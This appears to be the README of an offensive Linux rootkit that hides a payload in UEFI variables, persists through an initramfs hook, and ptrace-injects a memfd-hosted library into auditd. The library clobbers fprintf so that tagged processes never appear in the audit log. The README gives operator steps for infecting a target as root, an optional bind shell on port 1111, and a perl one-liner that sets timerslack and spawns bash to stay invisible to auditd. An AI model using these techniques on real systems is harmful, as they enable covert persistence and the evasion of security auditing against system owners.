A sample of hiding a payload in UEFI vars that persists in initramfs and then injects into auditd to make malicious processes invisible.
-
on attacker machine
make
- copy
splat
to target
-
on target
- run
splat
as root - reboot target
- use
timerslack.pl
to set your timerslack and become invisible to auditd
- run
ORDER is a file in initramfs that specifies order of hooks, but in this case, runs stage1
Run to infect system. Everything needed for infection is included:
- stage1
- stage2
- payload
Clobbers the fprintf symbol and keeps your tagged processes out of the audit log.
- Fixup registers due to internal libc dlopen required 16byte aligned stack entry.
- call glibc's
__libc_dlopen_mode
- jmp back to return value
The executable stage2.
- survive MS_MOVE in initramfs
- fanotify on systemd-sysctl
- ptrace inject into autid
- host injected.so in memfd
- coerce auditd to dlopen() injected.so in memfd
- exit
Takes stage2 out of UEFI var, uncompresses, jams it into memfd, and execs stage2
Gzipped stage2d executable
This code uses code adapted from https://github.com/eklitzke/ptrace-call-userspace, a fantastic bit of code from Evan Klitzke used under the ISC license.
- ptrace
auditd
- coerce
auitd
to callmemfd_create
- find
__libc_dlopen_mode
- write
injected.so
intoauditd
's memfd - coerce
auditd
to callmmap
- write
payload
into page returned from mmap - set
rip
to point to shellcode - release process
Fantastic lib from @emptymonkey. https://github.com/emptymonkey/ptrace_do
Used under terms in MIT license
Used in debugging to get a shell in the initramfs. You will need to
have installed busyboxy-static
package. Enable by defining
EMBED_SHELL
to 1 and get a local bind shell on port 1111. Note that
it will no longer fit into a UEFI variable because busyboxy is
gigantic. Use make install
and debug_utils/install.sh
infect.
Just a simple convenience function around zlib
Simple wrapper around the prtcl(PR_SET_TIMERSLACK)
. Scoff all you
want, but chances are, perl
is there when you land.
Get an operator friendly version like so:
echo "use the following:"
echo -n "echo '"
cat timerslack.pl|tr -d '\n'
echo "'|perl"
Which produces:
use the following:
echo 'require("syscall.ph");syscall(&SYS_prctl,29,50001);exec("/bin/bash");'|perl